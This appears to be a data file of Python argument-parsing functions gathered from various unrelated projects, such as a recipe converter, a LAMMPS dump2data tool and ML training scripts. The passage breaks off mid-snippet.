global parser\n parser = argparse.ArgumentParser(\n description='Certainly this isn\\'t how Food Network does it',\n formatter_class=argparse.RawDescriptionHelpFormatter,\n epilog=textwrap.dedent('''\n Recipe List must appear as follows. **\n =======\n recipe_name\n serveing_size\n ingredient 0\n ingredient 1\n ingredient 2\n ...\n ...\n ...\n ingredient n\n '''))\n parser.add_argument('input_file',\n help=\"An input text file to read in recipes from. \"\n \"Must adhere certain structure.**\")\n parser.add_argument('out_file', help=\"File to write json recipe data to.\")\n parser.add_argument('-s', '--serving-size', type=str,\n help='The number of servings you\\'d like to make.',\n dest='serving_size', default=4)\n parser.add_argument('-f', '--filter-items', type=split_cmdline_filter_items,\n dest='filter_items',\n help='A comma delimited string of ingredients to filter recipes by. '\n 'Multi-word ingredients must be quoted.')\n global args\n args = parser.parse_args()\n\n global serving_size_override\n serving_size_override = args.serving_size\n global filter_ingredients\n filter_ingredients = args.filter_items", "def parse_args(self, argv, env=None):\n env = env or os.environ\n self.argv = argv\n self.parser = HelpfulArgumentParser(add_help=False)\n self.parser.add_argument(\n '--help',\n action='store_true',\n help='prints usage information for the awx tool',\n )\n self.parser.add_argument(\n '--version',\n dest='conf.version',\n action='version',\n help='display awx CLI version',\n version=__version__\n )\n add_authentication_arguments(self.parser, env)\n add_output_formatting_arguments(self.parser, env)\n\n self.args = self.parser.parse_known_args(self.argv)[0]\n self.verbose = self.get_config('verbose')\n if self.verbose:\n logging.basicConfig(level='DEBUG')\n self.color = self.get_config('color')\n if not self.color:\n disable_color()\n fmt = self.get_config('format')\n if fmt not in FORMATTERS.keys():\n self.parser.error('No formatter %s available.' 
% (fmt))", "def _prepare(self):\n # Customize commandline arguments\n parser = argparse.ArgumentParser()\n self.initArgumentParser(parser, defaults=self.default_binding_overrides)\n self.__options = parser.parse_args()\n self.__bindings.update(args_util.parser_args_to_bindings(self.__options))\n\n self.start_logging()", "def define_and_process_args():\n\n description = main.__doc__\n formatter_class = argparse.ArgumentDefaultsHelpFormatter\n parser = argparse.ArgumentParser(description=description,\n formatter_class=formatter_class)\n\n parser.add_argument('--data_dir', default='~/Data/JIGSAWS/Suturing',\n help='Data directory.')\n parser.add_argument('--data_filename', default='standardized_data.pkl',\n help='''The name of the standardized-data pkl file that\n resides in data_dir.''')\n parser.add_argument('--test_users', default='B',\n help='''A string of the users that make up the test set,\n with users separated by spaces.''')\n\n parser.add_argument('--model_type', default='BidirectionalLSTM',\n help='''The model type, either BidirectionalLSTM,\n ForwardLSTM, or ReverseLSTM.''')\n parser.add_argument('--num_layers', type=int, default=1,\n help='The number of hidden layers.')\n parser.add_argument('--hidden_layer_size', type=int, default=1024,\n help='The number of hidden units per layer.')\n parser.add_argument('--dropout_keep_prob', type=float, default=0.5,\n help='''The fraction of inputs to keep whenever dropout\n is applied.''')\n\n parser.add_argument('--batch_size', type=int, default=5,\n help='The number of sequences in a batch/sweep.')\n parser.add_argument('--num_train_sweeps', type=int, default=600,\n help='''The number of training sweeps. A sweep\n is a collection of batch_size sequences that\n continue together throughout time until all\n sequences in the batch are exhausted. Short\n sequences grow by being wrapped around in\n time.''')\n parser.add_argument('--initial_learning_rate', type=float, default=1.0,\n help='The initial learning rate.')\n parser.add_argument('--num_initial_sweeps', type=int, default=300,\n help='''The number of initial sweeps before the\n learning rate begins to decay.''')\n parser.add_argument('--num_sweeps_per_decay', type=int, default=50,\n help='''The number of sweeps per learning-rate decay,\n once decaying begins.''')\n parser.add_argument('--decay_factor', type=float, default=0.5,\n help='The multiplicative learning-rate-decay factor.')\n parser.add_argument('--max_global_grad_norm', type=float, default=1.0,\n help='''The global norm is the norm of all gradients\n when concatenated together. If this global norm\n exceeds max_global_grad_norm, then all gradients\n are rescaled so that the global norm becomes\n max_global_grad_norm.''')\n\n parser.add_argument('--init_scale', type=float, default=0.1,\n help='''All weights will be initialized using a\n uniform distribution over\n [-init_scale, init_scale].''')\n parser.add_argument('--num_sweeps_per_summary', type=int, default=7,\n help='''The number of sweeps between summaries. 
Note:\n 7 sweeps with 5 sequences per sweep corresponds\n to (more than) 35 visited sequences, which is\n approximately 1 epoch.''')\n parser.add_argument('--num_sweeps_per_save', type=int, default=7,\n help='The number of sweeps between saves.')\n\n args = parser.parse_args()\n args.data_dir = os.path.expanduser(args.data_dir)\n args.test_users = args.test_users.split(' ')\n return args", "def __parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', '--force', action=\"store_true\", default=False,\n help='overwrite existing database files during import')\n parser.add_argument('-e', '--extension', action=\"store\", default='txt',\n help='specify file extension. default is \"txt\"')\n parser.add_argument('-d', '--delimiter', action=\"store\", default='\\t',\n help='specify column delimiter. default is tab (\\\\t)')\n parser.add_argument('-m', '--mark', action=\"store\", default='.',\n help='specify decimal mark for numeric data. default is'\n ' dot (.)')\n parser.add_argument('-o', '--outformat', action=\"store\", default='npz',\n help='specify output database format. default is \"npz\"'\n ' for numpy database. use \"mat\" for matlab '\n ' database format.')\n parser.add_argument('-r', '--recursive', action=\"store_true\", default=False,\n help='recursively walk through all sub-directories of'\n ' current working directory')\n parser.add_argument('-p', '--pcs', action=\"store_true\", default=True,\n help='indicate if files are pcs files.')\n parser.add_argument('-c', '--colheadlines', action=\"store\", default='1',\n help='number of lines spanned by the column headers')\n args = parser.parse_args()\n return args", "def _parseArgs():\n # HINT: If you consider adding an option,\n # please consider adding a config file option first.\n parser = ArgumentParser(description=STRING_USAGE_DESCRIPTION,\n epilog=STRING_USAGE_EPILOG)\n parser.add_argument('--version', action='version',\n version='%(prog)s (' + VERSIONSTRING + ')')\n parser.add_argument('-c', '--configfile', action='store',\n dest='configfile',\n default=DEFAULT_CONFIGFILE,\n help=STRING_USAGE_CONFIGFILE)\n parser.add_argument('-e', '--editconfig', action='store_true',\n dest='invoke_editconfig',\n default=False,\n help=STRING_USAGE_EDITCONFIG)\n parser.add_argument('--defaultconfig', action='store_true',\n dest='invoke_defaultconfig',\n default=False,\n help=STRING_USAGE_DEFAULTCONFIG)\n parser.add_argument('--printconfig', action='store_true',\n dest='invoke_printconfig',\n default=False,\n help=STRING_USAGE_PRINTCONFIG)\n _addOverwriteBool(parser, 'gui', 'gui', 'enable')\n parser.add_argument('-s', '--sources', section='wesen',\n dest='sources',\n action=_OverwriteConfigAction)\n parser.add_argument('-r', '--resume',\n dest='resume', action='store_true',\n default=False, help=STRING_USAGE_RESUME)\n return parser.parse_known_args()", "def ParseArgs(argv,\n misc_settings,\n data_settings,\n warning_strings=None):\n # Loop over the remaining arguments not processed yet.\n # These arguments are specific to the lttree.py program\n # and are not understood by this program.\n i = 1\n while i < len(argv):\n #sys.stderr.write('argv['+str(i)+'] = \\\"'+argv[i]+'\\\"\\n')\n if ((argv[i].lower() == '-atomstyle') or\n (argv[i].lower() == '-atom_style') or\n (argv[i].lower() == '-atom-style')):\n in_init = []\n if i + 1 >= len(argv):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by a an atom_style name.\\n'\n ' (Or single quoted string which includes a space-separated\\n'\n ' list of column 
names.)\\n')\n data_settings.column_names = AtomStyle2ColNames(argv[i + 1])\n sys.stderr.write(' \\\"Atoms\\\" column format:\\n')\n sys.stderr.write(\n ' ' + (' '.join(data_settings.column_names)) + '\\n')\n\n # ColNames2Coords() and ColNames2Vects() generate lists of\n # triplets of integers, storing the column numbers containing\n # x, y, and z coordinate values, and vx,vy,vz direction vectors.\n data_settings.ii_vects = ColNames2Vects(data_settings.column_names)\n ii_coords = ColNames2Coords(data_settings.column_names)\n # This program assumes that there is only one coordinate triplet\n # (x,y,z) for each atom. Hence we assume that len(ii_coords)==1\n assert(len(ii_coords) == 1)\n data_settings.i_coords = ii_coords[0]\n\n # Now figure out which columns correspond to atomid, atomtype,\n # molid\n data_settings.i_atomid, data_settings.i_atomtype, data_settings.i_molid = ColNames2AidAtypeMolid(\n data_settings.column_names)\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-icoord'):\n if i + 1 >= len(argv):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by list of integers\\n'\n ' corresponding to column numbers for coordinates in\\n'\n ' the \\\"Atoms\\\" section of a LAMMPS data file.\\n')\n ilist = argv[i + 1].split()\n if (len(ilist) % 3) != 0:\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by list of integers.\\n'\n ' This is usually a list of 3 intebers, but it can contain more.\\n'\n ' The number of cooridnate columns must be divisible by 3,\\n'\n ' (even if the simulation is in 2 dimensions)\\n')\n\n #ii_coords = []\n # for i in range(0, len(ilist)/3):\n # cols = [ilist[3*i]+1, ilist[3*i+1]+1, ilist[3*i+2]+1]\n # ii_coords.append(cols)\n # if ((len(ii_coords) != 0) or (len(ii_coords[0]) != 3)):\n # raise InputError('Error(dump2data): Argument \\\"'+argv[i]+'\\\" must be followed by exactly 3 integers.\\n')\n\n data_settings.i_coords = ilist\n if (len(i_coords) != 3):\n raise InputError('Error(dump2data): Argument \\\"' +\n argv[i] + '\\\" must be followed by exactly 3 integers.\\n')\n\n data_settings.i_coords = ii_coords[0]\n\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-ivect'):\n if i + 1 >= len(argv):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by list of integers\\n'\n ' corresponding to column numbers for direction vectors in\\n'\n ' the \\\"Atoms\\\" section of a LAMMPS data file.\\n')\n ilist = argv[i + 1].split()\n if (len(ilist) % 3) != 0:\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by list of integers.\\n'\n ' This is usually a list of 3 intebers, but it can contain more.\\n'\n ' The number of cooridnate columns must be divisible by 3,\\n'\n ' (even if the simulation is in 2 dimensions)\\n')\n\n data_settings.ii_vects = []\n for i in range(0, len(ilist) / 3):\n cols = [ilist[3 * i] + 1, ilist[3 * i + 1] +\n 1, ilist[3 * i + 2] + 1]\n setting.ii_vects.append(cols)\n # This should override any earlier settings as a result of the\n # -atomstyle argument. 
So you can specify a custom list of column\n # names using -atomstyle \"list of column names\", and then afterwards\n # specify which of these columns correspond to direction vectors\n # using the \"-ivect\" command line argument later on.\n # This way, in theory you should be able to read columns from\n # new custom atom-styles that have not been invented yet.\n # (Although I haven't tested this.)\n\n del(argv[i:i + 2])\n # i_atomid is not really needed for this program, but I load it anyway\n elif ((argv[i].lower() == '-iatomid') or\n (argv[i].lower() == '-iid') or\n (argv[i].lower() == '-iatom-id')):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer\\n'\n ' (>=1) indicating which column in the \\\"Atoms\\\" section of a\\n'\n ' LAMMPS data file contains the atom id number (typically 1).\\n'\n ' (This argument is unnecessary if you use the -atomstyle argument.)\\n')\n i_atomid = int(argv[i + 1]) - 1\n del(argv[i:i + 2])\n # i_atomtype is not really needed for this program, but I load it\n # anyway\n elif ((argv[i].lower() == '-iatomtype') or\n (argv[i].lower() == '-itype') or\n (argv[i].lower() == '-iatom-type')):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer\\n'\n ' (>=1) indicating which column in the \\\"Atoms\\\" section of a\\n'\n ' LAMMPS data file contains the atom type.\\n'\n ' (This argument is unnecessary if you use the -atomstyle argument.)\\n')\n i_atomtype = int(argv[i + 1]) - 1\n del(argv[i:i + 2])\n # i_molid is not really needed for this program, but I load it anyway\n elif ((argv[i].lower() == '-imolid') or\n (argv[i].lower() == '-imol') or\n (argv[i].lower() == '-imol-id') or\n (argv[i].lower() == '-imoleculeid') or\n (argv[i].lower() == '-imolecule-id')):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer\\n'\n ' (>=1) indicating which column in the \\\"Atoms\\\" section of a\\n'\n ' LAMMPS data file contains the molecule id number.\\n'\n ' (This argument is unnecessary if you use the -atomstyle argument.)\\n')\n del(argv[i:i + 2])\n # Which snapshot do we want?\n elif (argv[i].lower() == '-t'):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer indicating\\n'\n ' the snapshot you want to extract from the dump file (trajectory).\\n'\n ' This integer should match the timestep corresponding to the snapshot\\n'\n ' whose coordinates you wish to extract.\\n')\n misc_settings.timestep_str = argv[i + 1]\n del(argv[i:i + 2])\n misc_settings.multi = False\n misc_settings.last_snapshot = False\n\n elif (argv[i].lower() == '-tstart'):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag should be followed by an integer indicating\\n'\n ' the first snapshot you want to extract from the dump file (trajectory).\\n'\n ' This integer should match the timestep corresponding to the snapshot\\n'\n ' (after which) you wish to extract coordinates.\\n')\n misc_settings.tstart = float(argv[i + 1])\n del(argv[i:i + 2])\n misc_settings.multi = True\n\n elif (argv[i].lower() == '-tstop'):\n if ((i + 1 >= len(argv)) or (not str.isdigit(argv[i + 1]))):\n raise InputError('Error(dump2data): ' + argv[i] + ' flag 
should be followed by an number indicating\\n'\n ' the first snapshot you want to extract from the dump file (trajectory).\\n'\n ' Snapshots after this timestep will be ignored.\\n')\n misc_settings.tstop = float(argv[i + 1])\n del(argv[i:i + 2])\n misc_settings.multi = True\n\n elif (argv[i].lower() == '-center'):\n misc_settings.center_snapshot = True\n del(argv[i:i + 1])\n\n elif ((argv[i].lower() == '-raw') or (argv[i].lower() == '-rawout')):\n misc_settings.output_format = 'raw'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-rawin'):\n misc_settings.input_format = 'raw'\n misc_settings.multi = False\n del(argv[i:i + 1])\n\n elif ((argv[i].lower() == '-xyz') or\n (argv[i].lower() == '-xyz-type') or\n (argv[i].lower() == '-xyzout')):\n misc_settings.output_format = 'xyz'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-xyz-id'):\n misc_settings.output_format = 'xyz-id'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-xyz-mol'):\n misc_settings.output_format = 'xyz-mol'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-xyz-type-mol'):\n misc_settings.output_format = 'xyz-type-mol'\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-xyzin'):\n misc_settings.input_format = 'xyz'\n misc_settings.multi = False\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-multi'):\n misc_settings.multi = True\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-last'):\n misc_settings.last_snapshot = True\n misc_settings.multi = False\n del(argv[i:i + 1])\n\n elif (argv[i].lower() == '-interval'):\n misc_settings.skip_interval = int(argv[i + 1])\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-scale'):\n misc_settings.scale = float(argv[i + 1])\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-id'):\n misc_settings.atom_id_intervals += Str2IntervalUnion(argv[i+1])\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-type'):\n misc_settings.atom_type_intervals += Str2IntervalUnion(argv[i+1])\n del(argv[i:i + 2])\n\n elif (argv[i].lower() == '-mol'):\n misc_settings.mol_id_intervals += Str2IntervalUnion(argv[i+1])\n del(argv[i:i + 2])\n\n elif ((argv[i].lower() == '-in') or\n (argv[i].lower() == '-dump')):\n misc_settings.in_coord_file_name = argv[i+1]\n del(argv[i:i + 2])\n\n elif ((argv[i][0] == '-') and (__name__ == \"__main__\")):\n raise InputError(\n 'Error(dump2data): Unrecogized command line argument \\\"' + argv[i] + '\\\"\\n')\n else:\n i += 1\n\n usage_examples = \\\n\"\"\" Typical usage:\ndump2data.py orig_file.data < dump.lammpstrj > new_file.data\n (This extracts last snapshot, uses \"full\" atom_style.)\n Additional options:\ndump2data.py -t t -atomstyle style orig.data < dump.lammpstrj > new.data\n\"\"\"\n\n # if __name__ == \"__main__\":\n\n if (len(argv) > 2):\n # if there are more than 2 remaining arguments,\n # AND\n # no other function will process the remaining argument list\n # (ie. 
if __name__ == \"__main__\")\n # THEN\n raise InputError(' ----\\n'\n 'ERROR(dump2data): You have too many arguments (or unrecognized arguments):\\n'\n ' \\\"' + (' '.join(argv)) + '\\\"\\n'\n ' ----\\n'\n + usage_examples)\n elif (len(argv) < 2):\n if misc_settings.output_format == 'data':\n raise InputError(' ----\\n'\n 'ERROR(dump2data): Problem with argument list:\\n'\n ' Expected a LAMMPS .data file as an argument.\\n'\n ' ----\\n'\n + usage_examples)\n else:\n in_data_file = open(argv[1], 'r')\n data_settings.file_name = argv[1]\n data_settings.contents = in_data_file.readlines()\n in_data_file.close()\n\n # end of if-then statement for \"if __name__ == \"__main__\"\"\n\n if len(data_settings.i_coords) == 0:\n if warning_strings != None:\n warning_strings.append(\n 'WARNING(dump2data): atom_style unknown. (Use -atomstyle style. Assuming \\\"full\\\")')\n warn_atom_style_unspecified = True\n # The default atom_style is \"full\"\n data_settings.column_names = AtomStyle2ColNames('full')\n ii_coords = ColNames2Coords(data_settings.column_names)\n # This program assumes that there is only one coordinate triplet\n # (x,y,z) for each atom. Hence we assume that len(ii_coords)==1\n assert(len(ii_coords) == 1)\n data_settings.i_coords = ii_coords[0]\n data_settings.ii_vects = ColNames2Vects(data_settings.column_names)\n data_settings.i_atomid, data_settings.i_atomtype, data_settings.i_molid = ColNames2AidAtypeMolid(\n data_settings.column_names)\n\n # sys.stderr.write('########################################################\\n'\n # '## WARNING: atom_style unspecified ##\\n'\n # '## --> \\\"Atoms\\\" column data has an unknown format. ##\\n'\n # '## Assuming atom_style = \\\"full\\\" ##\\n'\n # '########################################################\\n'\n # '## To specify the \\\"Atoms\\\" column format you can: ##\\n'\n # '## 1) Use the -atom_style \\\"STYLE\\\" argument ##\\n'\n # '## where \\\"STYLE\\\" is a string indicating a LAMMPS ##\\n'\n # '## atom_style, including hybrid styles.(Standard ##\\n'\n # '## atom styles defined in 2011 are supported.) ##\\n'\n # '## 2) Use the -atom_style \\\"COL_LIST\\\" argument ##\\n'\n # '## where \\\"COL_LIST\" is a quoted list of strings ##\\n'\n # '## indicating the name of each column. ##\\n'\n # '## Names \\\"x\\\",\\\"y\\\",\\\"z\\\" are interpreted as ##\\n'\n # '## atomic coordinates. \\\"mux\\\",\\\"muy\\\",\\\"muz\\\" ##\\n'\n # '## and \\\"quati\\\",\\\"quatj\\\",\\\"quatk\\\" are ##\\n'\n # '## interpreted as direction vectors. ##\\n'\n # '## 3) Use the -icoord \\\"cx cy cz...\\\" argument ##\\n'\n # '## where \\\"cx cy cz\\\" is a list of integers ##\\n'\n # '## indicating the column numbers for the x,y,z ##\\n'\n # '## coordinates of each atom. ##\\n'\n # '## 4) Use the -ivect \\\"cmux cmuy cmuz...\\\" argument ##\\n'\n # '## where \\\"cmux cmuy cmuz...\\\" is a list of ##\\n'\n # '## integers indicating the column numbers for ##\\n'\n # '## the vector that determines the direction of a ##\\n'\n # '## dipole or ellipsoid (ie. a rotateable vector).##\\n'\n # '## (More than one triplet can be specified. The ##\\n'\n # '## number of entries must be divisible by 3.) ##\\n'\n # '## 5) Include a ##\\n'\n # '## write(\\\"in_init.txt\\\"){atom_style ...} ##\\n'\n # '## statement in your .ttree file. 
##\\n'\n # '########################################################\\n')", "def parse_cmd_args(self, args):\n\t\tfor k, v in vars(args).items():\n\t\t\tif k == \"cfg\":\n\t\t\t\tcontinue\t\t\t\t# reserved keyword (for loading settings)\n\n\t\t\tif v is None:\n\t\t\t\tcontinue\t\t\t\t# None stands for not set\n\n\t\t\tif not hasattr(self, k):\n\t\t\t\traise RuntimeError(\"[ERROR] Not recognized argument from comamnd line: {}.\".format(k))\n\t\t\tsetattr(self, k, v)", "def _parse_arguments(self, argv):\n parser = argparse.ArgumentParser()\n for section in self.config.sections():\n for key in self.config[section]:\n arg_name = '--' + key.replace(' ', '_').lower()\n parser.add_argument(arg_name)\n override_kwargs = vars(parser.parse_args(argv))\n override_kwargs = {k: v for k,\n v in override_kwargs.items() if v is not None}\n self._overwrite_with_kwargs(**override_kwargs)", "def parse_command_line_arguments(command_line_arguments):\n # First determine if a we're loading from a file\n filename = False\n if \"--file\" in command_line_arguments:\n index = command_line_arguments.index(\"--file\")+1\n filename = command_line_arguments[index]\n if output.tracking_suffix in filename:\n # Assumes simulation in progress. So, if final_sweep ==\n # current_sweep, the simulation will load and then\n # immediately end.\n return get_progress_file_info(filename)\n if not (output.output_suffix in filename):\n raise ValueError(\"Can only load from *.boundaryprg2p1 or \"\n +\"*.boundary2p1 files!\")\n # If filename is of type *.boundary2p1, we assume its okay and\n # load from it. None of the other command line arguments\n # change.\n\n if \"--select\" in command_line_arguments:\n index = command_line_arguments.index(\"--select\")+1\n if command_line_arguments[index] == \"std\":\n algorithm = monte_carlo.select_for_curvature\n elif command_line_arguments[index] == \"area\":\n algorithm = monte_carlo.select_for_area\n else:\n algorithm = default_algorithm\n else:\n algorithm = default_algorithm \n\n if \"--target-area\" in command_line_arguments:\n index = command_line_arguments.index(\"--target-area\")+1\n target_area = int(eval(command_line_arguments[index]))\n else:\n target_area = int(eval(command_line_arguments[0]))\n\n if \"--target-std\" in command_line_arguments:\n index = command_line_arguments.index(\"--target-std\")+1\n target_std = float(eval(command_line_arguments[index]))\n else:\n target_std = default_target_std\n\n if \"--area-damping\" in command_line_arguments:\n index = command_line_arguments.index(\"--area-damping\")+1\n area_damping_strength = float(eval(command_line_arguments[index]))\n else:\n area_damping_strength = default_area_damping\n if not 0 <= area_damping_strength <= 1:\n raise ValueError(\"Damping must be between 0 and 1.\")\n\n if \"--std-damping\" in command_line_arguments:\n index = command_line_arguments.index(\"--std-damping\")+1\n std_damping_strength = float(eval(command_line_arguments[index]))\n else:\n std_damping_strength = default_std_damping\n if not 0 <= area_damping_strength <= 1:\n raise ValueError(\"Damping must be between 0 and 1.\")\n\n if \"--initial\" in command_line_arguments:\n index = command_line_arguments.index(\"--initial\")+1\n initial_sweep = int(eval(command_line_arguments[index]))\n else:\n initial_sweep = default_initial_sweep\n\n if \"--final\" in command_line_arguments:\n index = command_line_arguments.index(\"--final\")+1\n final_sweep = int(eval(command_line_arguments[index]))\n else:\n final_sweep = default_final_sweep\n\n if \"--save\" in 
command_line_arguments:\n index = command_line_arguments.index(\"--save\")+1\n save_every_n_sweeps = int(eval(command_line_arguments[index]))\n else:\n save_every_n_sweeps = default_save_every_n_sweeps\n if save_every_n_sweeps < 1:\n raise ValueError(\"You must save at least every 1 sweeps!\")\n\n if \"--v5\" in command_line_arguments:\n index = command_line_arguments.index(\"--v5\")+1\n v5damping = int(eval(command_line_arguments[index]))\n else:\n v5damping = target_area/10\n\n if \"--v6\" in command_line_arguments:\n index = command_line_arguments.index(\"--v6\")+1\n v6damping = int(eval(command_line_arguments[index]))\n else:\n v6damping = target_area/10\n \n if \"--many\" in command_line_arguments:\n if \"--one\" in command_line_arguments or \"--exact\" in command_line_arguments:\n raise ValueError(\"Contradictory input!\")\n if \"--micro\" in command_line_arguments:\n gather_data_function = output.save_many_microscopically_optimal\n else:\n gather_data_function = output.gather_data_to_n_files\n elif \"--one\" in command_line_arguments:\n if \"--many\" in command_line_arguments or \"--exact\" in command_line_arguments:\n raise ValueError(\"Condtradictory input!\")\n if \"--micro\" in command_line_arguments:\n gather_data_function = output.stop_at_microscopically_optimal\n else:\n gather_data_function = output.gather_data_to_1_file\n elif \"--exact\" in command_line_arguments:\n if \"--many\" in command_line_arguments or \"--one\" in command_line_arguments:\n raise ValueError(\"Contradictory input!\")\n gather_data_function = output.generate_n_exact_spheres\n index = command_line_arguments.index(\"--exact\")+1\n # In this case, v5damping is fitness_damping, as defined\n # in generate_n_exact_spheres\n v5damping = int(eval(command_line_arguments[index]))\n else:\n if \"--micro\" in command_line_arguments:\n gather_data_function = output.stop_at_microscopically_optimal\n else:\n gather_data_function = output.gather_data_to_1_file\n\n # return a class with all the info we need\n params = parameters(filename, target_area, area_damping_strength,\n target_std, std_damping_strength,\n initial_sweep, final_sweep,\n save_every_n_sweeps,\n v5damping, v6damping,\n algorithm,\n gather_data_function)\n return params", "def parse_args(self, args):\n raise Exception(\"Not implemented\")", "def __parse_args(self):\n _method_name = '__parse_args'\n\n if self.__raw_args is not None and len(self.__raw_args) > 0:\n if isinstance(self.__raw_args, list):\n arguments = self.__raw_args\n else:\n arguments = self.__raw_args.split()\n\n for argument in arguments:\n if self.__client_server_regex.match(argument):\n self.__client_server_args.append(argument)\n elif self.__x_args_size_regex.match(argument):\n self.__process_x_size_arg(argument)\n elif self.__x_args_value_regex.match(argument):\n self.__process_x_value_arg(argument)\n elif self.__x_args_other_regex.match(argument):\n self.__process_x_other_arg(argument)\n elif self.__xx_args_switch_regex.match(argument):\n self.__process_xx_switch_arg(argument)\n elif self.__xx_args_value_regex.match(argument):\n self.__process_xx_value_arg(argument)\n elif self.__sys_props_regex.match(argument):\n self.__process_sys_prop_arg(argument)\n else:\n self._logger.finer('WLSDPLY-08300', argument, class_name=self._class_name, method_name=_method_name)\n self.__unsorted_args.append(argument)", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', 
dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n \n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def ParseCommandLineArgs():\n\n theParameterManager = ParameterManager() \n \n # set input options\n parser = argparse.ArgumentParser(description='Command line input.')\n parser.add_argument(\"-i\",\"--input\",action=\"store\", help = \"Load XML input file\")\n parser.add_argument(\"-p\",\"--param\",action=\"append\", help = \"Add user-defined parameter\")\n \n rv = parser.parse_args()\n \n # strip out params\n if (rv.param):\n for param in rv.param:\n splt = string.split(param,\"=\",1)\n if (len(splt) < 2 ): \n raise BluecapError(\"Error: Input parameters should be in the form -p key=value \")\n name = splt[0].strip()\n paramString = splt[1]\n theParameterManager.SetParameter(name,paramString)\n \n \n # sanity checks\n if (not rv.input):\n print(\"Warning - failed to provide input file\")\n #raise IFDError(\"Input error\",\"Failed to provided input file\")\n \n \n return rv", "def parse_args(self, argv):\n\t\tself.argv={'user': argv[1]}", "def parse_args():\n sentinel_dict = {}\n\n def _preprocess_sysargv(argv):\n inputs = []\n for arg in argv[1:]:\n # handles case where values contain --, otherwise they will\n # be interpreted as arguments.\n if '--,' in arg or ',--' in arg or arg == '--':\n sentinel = uuid4().hex\n key = '%s' % sentinel\n sentinel_dict[key] = arg\n inputs.append(sentinel)\n else:\n inputs.append(arg)\n return inputs\n\n def _postprocess_sysargv(v):\n if v in sentinel_dict:\n return sentinel_dict.get(v)\n else:\n return v\n\n #----- read input arguments\n for i, arg in enumerate(sys.argv):\n if (arg[0] == '-') and arg[1].isdigit(): sys.argv[i] = ' ' + arg\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-u', action='store_true', dest='helpmenu',help='extended HELP MENU with examples')\n parser.add_argument('-i','--infile',action='store', dest='infile',help='name of file with SAC or mseed file(s)')\n parser.add_argument('-g','--gain',action='store', dest='sensitivity',help='Stage 0 sensitivity')\n parser.add_argument('-N','--net', action='store', dest='network',help='network')\n parser.add_argument('-S','--sta', action='store', dest='station',help='station')\n parser.add_argument('-C','--cha', action='store', 
dest='chantype',help='chantype')\n parser.add_argument('-s','--start', action='store', dest='startstring',help='start time YYYY-MM-DDTHH:MM:SS')\n parser.add_argument('-e','--end', action='store', dest='endstring',help='end time YYYY-MM-DDTHH:MM:SS')\n parser.add_argument('-d','--duration', action='store', dest='durationinhours',help='duration in hours')\n parser.add_argument('-dc','--dc','--datacenter', action='store', dest='datacenter',default='IRIS',help='FDSN data center (e.g. IRIS, SCEDC, NCEDC)')\n parser.add_argument('-p','--plot',action='store_true',dest='iplot',help='make plots of each hourly trace (NOTE: can be slow)')\n\n helpextended = parser.parse_args(_preprocess_sysargv(sys.argv)).helpmenu\n if ( helpextended is True ):\n print ('')\n print ('portable_pip_squeak: assess a station either using local data or to be downloaded')\n print ('')\n print ('Usage: portable_pip_squeak.py [options]')\n print ('')\n print ('EXAMPLES:')\n print ('portable_pip_squeak.py --infile my_SAC_files.txt')\n print ('portable_pip_squeak.py -N UW -S TKEY -C HH -s 2018-01-01T00:00:00 -d 2 -p')\n print ('portable_pip_squeak.py -N CI -S LEO -C HN -s 2020-01-01T00:00:00 -d 24 -dc SCEDC')\n print ('')\n print ('Inputs if supplying your own data:')\n print (' -i, --infile Name of text file with SAC/mseed file(s) of 3 (Z,N,E) traces.')\n print (' -g, --gain Gain or Stage 0 sensitivity')\n print (' ')\n print ('Inputs if downloading data:')\n print (' -s, --starttime Trace start time (YYYY-MM-DD,HH:MM:SS)')\n print ('')\n print (' One of these:')\n print (' -e, --endtime Trace end time (YYYY-MM-DD,HH:MM:SS)')\n print (' -d, --duration Duration 